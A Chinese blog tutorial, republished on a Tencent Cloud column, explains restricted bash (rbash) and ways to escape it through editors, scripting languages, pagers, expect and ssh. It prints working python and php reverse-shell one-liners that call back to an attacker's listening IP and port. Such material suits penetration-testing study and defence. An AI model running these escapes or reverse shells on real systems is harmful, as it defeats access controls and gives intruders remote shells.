专栏首页E条咸鱼RBash - 受限的Bash绕过

RBash - 受限的Bash绕过

man bash的时候,里面会有介绍到关于rbash是个什么东西

翻译解释一下就是

如果bash以rbash这个名字启动,或者是通过-r选项调用时,那么这个shell就会受限 受限shell(以下统称为rbash)和bash相同,但以下情况是不允许rbash执行的

  1. 使用命令cd更改目录
  2. 设置或者取消环境变量的设置(SHELL, PATH, ENV, or BASH_ENV)
  3. 指定包含参数'/'的文件名
  4. 指定包含参数' - '的文件名
  5. 使用重定向输出'>', '>>', '> |', '<>' '>&','&>'

大致的限制如上

那么我们如果在实际环境中,如果想要对环境进行进一步的操作,那么rbash肯定是不符合要求的,所以才有了“绕过”这一行为

而因为rbash的特殊性问题,绕过的方法,大多都是通过Linux机器上现有的软件,来执行一个没有限制的shell回来使用

创建限制shell的用户

在RHEL和Centos的系统中,rbash不能直接实现,所以在开始之前,我们需要通过 ln-s来建立一个软连接

然后创建用户的时候,在设置用户是以/bin/rbash来启动的shell

试试水,发现用户 elapse不能切换目录了,至于为什么这样能生效,在上面解释了rbash和bash是同个东西,只不过不同命名启动时,效果不一样

RBash 绕过

hacking articles中,有解释过类似的行为

他将绕过rbash的操作分为了6个部分

第一个是使用Linux现有的软件,例如vi或者ed这类编辑器,来执行一个shell

第二个是使用一种语言来执行命令,返回一个无限制的shell,例如使用 python的os库执行 /bin/bash

第三个是使用系统命令或者php之类的,反弹一个系统shell到你的攻击机上

第四个是利用系统中的二进制文件来进行绕过,这里给出的文件有 more less man

第五个是,利用expect来绕过

第六个是,通过ssh来绕过rbash的限制

编辑器绕过rbash

  • vi编辑器

在命令行中,输入 vi,在末行模式中,输入 :setshell=/bin/bash

这里就直接将shell设置为/bin/bash

接着在执行命令 shell就好了

然后就有一个无限制的shell了

  • ed编辑器

使用编程语言绕过rbash

  • python
  • perl

反弹shell来绕过rbash

  • python反弹

首先在攻击机中 nc-lvp开启监听端口,然后靶机中输入

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

靶机

攻击机

  • php反弹
php -r '$sock=fsockopen("LISTENING IP",LISTENING PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

利用二进制文件

  • more
直接 ! 'sh'
  • less

然后末行模式输入 !'sh'

  • man

和上面一样

Expect 绕过rbash

expect是免费的编程工具,用来实现自动的交互式任务,在实际环境中脚本或者命令都需要从终端输入来继续运行,而expect就可以根据程序的提示来模拟输入个程序

ssh绕过rbash

好像不止有这种写法,但是版本问题只能用这个

还有 -t"/binbash"

参考链接

https://www.howtoing.com/rbash-a-restricted-bash-shell-explained-with-practical-examples/

https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/

文章分享自微信公众号:
E条咸鱼

本文参与 腾讯云自媒体分享计划 ,欢迎热爱写作的你一起参与!

作者:现在你看到我的ID了
原始发表时间:2020-01-05
如有侵权,请联系 cloudcommunity@tencent.com 删除。
登录 后参与评论
0 条评论

相关文章

  • 「翻译」 如何Bypass rbash

    我们都知道安全分析师和黑客的关系像tom和jerry一样,一个人采取措施加强安全等级,另外一个人试图绕过它。这种类似的情况出现在我解决CTF挑战的时候,总是一个...

    重生信息安全
  • vulhub之DC-2

    乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任...

    乌鸦安全
  • Linux下通过受限bash创建指定权限的账号

    在日常业务运维中,有时为了配合解决问题,需要给非运维人员开通系统账号,用于查询日志或代码。通常为了系统安全或避免不必要的误操作等目的,会将账号权限降至最低。下面...

    洗尽了浮华
  • Vulnhub-MATRIX: 1

    下载地址:http://www.vulnhub.com/entry/matrix-1,259/

    亿人安全
  • 【Vulnhub靶机系列】DC2

    Flag 1: Your usual wordlists probably won’t work, so instead, maybe you just nee...

    Ms08067安全实验室
  • 渗透测试之Vulnhub-DC2

    本篇文章记录为vulnhub系列DC2,练习过程中也参考了其他大师傅的文章,加上个人的一些思路见解就有了此文,个人拙见定会有出错,还请各位师傅们指正。参考文章

    TenG
  • Linux 提权总结

    可见在权限位置有一个s权限。那么这个s的作用是什么呢? 答案是当其他用户执行该文件时,该文件会以root的身份执行。 这里就涉及到了Effective UID和...

    ConsT27
  • 【vulnhub】DC-2

    扫一波端口,发现仅有 80 和 7744,需要注意的是 http://dc-2,这样的话要改一下 hosts 文件,不然就会去访问:http://dc-2/

    yichen
  • DC-2靶机渗透实操全过程,一起来玩吧!

    这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。靶机下载地址:http://www.five86.com/dc-2.html

    网络安全自修室
  • 简单的DC-2靶机渗透实战

    这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。靶机下载地址:http://www.five86.com/dc-2.html

    网络安全自修室
  • DC-2

    在这里要配置本地dns解析,将目标ip地址(192.168.44.133 dc-2)添加进hosts中。

    黑白天安全
  • 详解bash中的初始化机制

    login shell启动时首先读取/etc/profile系统全局配置,然后依次查找~/.bash_profile、~/.bash_login、~/.prof...

    砸漏
  • 靶机渗透DC-2

    HipHip
  • 靶场攻略 | Chaos (hack the box)

    |_http-title: Site doesn't have a title (text/html).

    贝塔安全实验室
  • Machine_matrix靶机渗透

    用nmap -sV扫描靶机后,发现开放了31337端口,而且还是python开启的SimpleHttp

    Elapse
  • dash & rbash & nc.openbsd ​| Linux 后门系列

    今天在查找资料的时候在一篇文章中发现了 dash 和 nc.openbsd 这两个命令,dash、rbash、nc.openbsd 和 nc.tradition...

    意大利的猫
  • Vulnhub渗透测试:DC-2

    ​ 由于最近一段时间都在准备大二上学期推迟的期末考试,所以导致安全方面的学习的文章没有持续更新,对于内网渗透来说,我还是比较喜欢搞的,一是知识点概括比较全...

    ly0n
  • 靶机练习 | DC:2 靶机渗透练习

    目标开放了80端口和7744端口,7744端口上是ssh,80端口的web页面需要修改hosts才能访问

    天钧
  • Vulnhub渗透测试:DC-3

    ​ 由于最近一段时间都在准备大二上学期推迟的期末考试,所以导致安全方面的学习的文章没有持续更新,对于内网渗透来说,我还是比较喜欢搞的,一是知识点概括比较全...

    ly0n

扫码关注腾讯云开发者

领取腾讯云代金券